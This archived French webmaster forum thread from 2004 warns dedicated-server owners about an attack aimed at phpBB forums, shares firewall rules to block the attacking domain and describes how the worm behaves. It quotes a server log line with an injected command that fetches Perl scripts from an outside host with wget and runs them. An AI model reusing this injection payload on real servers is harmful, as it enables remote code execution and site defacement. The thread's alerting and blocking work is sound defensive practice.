Webmaster Hub > Avis aux utilisateurs de dédiés

Version complète: sur le forum Webmaster Hub : Avis aux utilisateurs de dédiés

Webmaster Hub > Accueil > Annonces du Hub

Dan

samedi 25 décembre 2004 à 12:30

Bonjour à tous,

Il n'est pas dans les habitudes du Hub de montrer du doigt, et les règles du forum demandent d'éviter cette attitude.
Je prend la liberté de passer outre ces règles pour signaler des attaques de serveurs dédiés au départ d'un site www.visualcoders.net .

Si vous trouvez les chaînes de caractères du style:

CODE

milan.dnstraffic.net - - [25/Dec/2004:12:22:12 +0100] "GET /index.php?amp;act=Search&f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 63629 "-" "LWP::Simple/5.803"

dans vos logs, cela signifie qu'une attaque est en cours.
L'origine (ici milan.dnstraffic.net) peut changer dans vos logs.

Je m'occupe de bloquer le firewall en entrée/sortie pour les dédiés dont j'ai la charge. Pour les autres, si vous avez iptables configuré, il suffit de lancer ces 2 commandes pour bloquer le trafic de visualcoders.net:

CODE

/sbin/iptables -A INPUT -s www.visualcoders.net -j DROP
/sbin/iptables -A OUTPUT -s www.visualcoders.net -j DROP

Dan

adn

samedi 25 décembre 2004 à 12:42

Merci Dan

Même sans être une victime de ses attaques, est-il souhaitable de bloquer ce domaine ?

Dan

samedi 25 décembre 2004 à 12:56

Je pense que oui, il s'agit manifestement d'un site qui a mis à dispo des scripts permettant des attaques par Perl (en utilisant LWP::Simple)

kamino

samedi 25 décembre 2004 à 13:07

Bonjour, Merci de l'info

Dan

samedi 25 décembre 2004 à 13:32

Recherche faite, ces scripts essaient de trouver des forums phpbb < 2.0.11 pour exploiter les failles découvertes récemment.

Ca s'installe dans /tmp

Ca récupère
-http://www.visualcoders.net/spybot.txt
-http://www.visualcoders.net/worm1.txt
-http://www.visualcoders.net/php.txt
-http://www.visualcoders.net/zone.txt
-http://www.visualcoders.net/ownz.txt

1 ça exécute spybot.txt qui ouvre des socket
2 ça exécute worm1.txt qui lance des requete sur les moteurs de
recherche cherchant viewtopic.php pour exploiter la faille phpBB
3 ça exécute ownz.txt qui change tout les index dans /home par un
message du hacker.
4 php.txt lui recherche de nouveaux serveurs a hacker

Tout ca se cache sous un process httpd (/usr/local/sbin/httpd que vous n'avez
pas si vous êtes en release ovh)

Dan

dimanche 26 décembre 2004 à 12:09

Pour info, les attaques continuent encore aujourd'hui.

C'est ce qui explique en partie le nombre important de visiteurs sur le Hub en ce dimanche 26 décembre.

Comme le Hub n'est pas vulnérable, le seul risque est de nous pomper un peu de bande passante. Pas bien grave !

Image des connexions TCP simultanées depuis 24H. On voit bien que la nuit a été chaude

Cette image est en 'temps réel'... on voit bien l'amélioration des dernières heures

Xavfun

lundi 27 décembre 2004 à 02:20

Hello,

bah heureusement qu'il y a un bon qui s'occupe de mon dédié, car je comprends pas tout... (même si j'avais demandé à Dan par MP si mon forum courrait un risque).

Sans vouloir être parano., il y a beaucoup trop peu de mondes qui pensent à la sécurités de leurs sites, c'est pas étonant qu'il y ait de plus en plus de "déffacement de sites"

Merci Dan, de mon côté j'ai prévenue pas mal de monde qui utilisaient ces forums.
Faites en autant, quand on est avertit, on prends des mesures adéquat

planete95

mardi 28 décembre 2004 à 14:49

Si je tenais le webmaster de ce site...enfin bon, il existera toujours des gens comme cela.

Ceci est une version "bas débit" de notre forum. Pour voir la version complète avec plus d'information, la mise en page et les images, veuillez cliquer ici.